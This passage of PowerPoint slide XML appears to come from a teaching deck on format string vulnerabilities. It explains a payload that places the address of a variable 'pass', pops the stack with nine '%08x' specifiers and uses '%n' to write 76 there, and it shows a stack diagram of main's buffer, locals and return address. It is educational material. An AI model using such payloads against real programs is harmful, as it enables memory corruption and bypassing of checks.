            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>Then 9 “%08x” written and  note that  there’s no argument given explicitly.        (Only popped from stack         ).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>Next, ‘%n’ is operated.  The number of characters written so far, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>“\xd0 \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>4 byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>) + “%08x" (8byte) x 9 pieces (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>72 byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>76  </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>is  entered to  the  popped location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>This time, the popped location is the pointer of integer so 4 bytes, the content of buff[0][1][2][3], </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>that is ”\xd0 \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>” and this is the address of variable pass.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>Finally, we found that after the nine “%08x”, the “%n” corresponds to the pass address “\xd0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>”.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="shape1405"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="1844824"/>
            <a:ext cx="5403215" cy="561340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="shape1406"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397810" y="2588964"/>
            <a:ext cx="5403215" cy="841375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="직사각형 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10031830" y="2499040"/>
            <a:ext cx="1224136" cy="3188977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10031830" y="5688017"/>
            <a:ext cx="1224136" cy="215476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>return address</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10094331" y="726015"/>
            <a:ext cx="1099133" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>top of stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="직사각형 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10030068" y="5902049"/>
            <a:ext cx="1225898" cy="794976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>for main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9922061" y="2549807"/>
            <a:ext cx="1390124" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Locals for main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buff [0] [1] [2] [3]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff [4] [5] [6] [7]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff [8] [9] [10] [11]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff[12][13][14][15]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff [16][17][18][19]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff[20][21][22][23]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff [24][25][26][27]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff[27][28][29][30]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff[31][32][33][34]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff[35][36][37][38]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.......</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[508] [509] [510] [ 511]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="오른쪽 중괄호 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11255965" y="2499040"/>
            <a:ext cx="327151" cy="41965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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11564929" y="4250219"/>
            <a:ext cx="1099133" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>frame </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>main()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="직선 화살표 연결선 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9925362" y="5592227"/>
            <a:ext cx="505627"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8959934" y="5442907"/>
            <a:ext cx="986167" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>0xbfffebd0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="표 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A61676F-5E19-4A20-9540-162E5A34911F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3852136173"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6852557" y="854414"/>
          <a:ext cx="1637211" cy="3901440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1637211">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="213640">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="7030A0"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="D9BED7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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      f      o</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02"/>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r     m     a     t</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03"/>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s     t      r       I</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04"/>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n    g            </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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05"/>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\xd0 \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xeb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xbf</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06"/>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07"/>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08"/>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09"/>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10"/>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11"/>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12"/>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0013"/>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215011281"/>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>%      0      8       x</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182431538"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213640">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000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>%      n                </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.  </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent4">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="D9BED7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2111803989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="직사각형 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
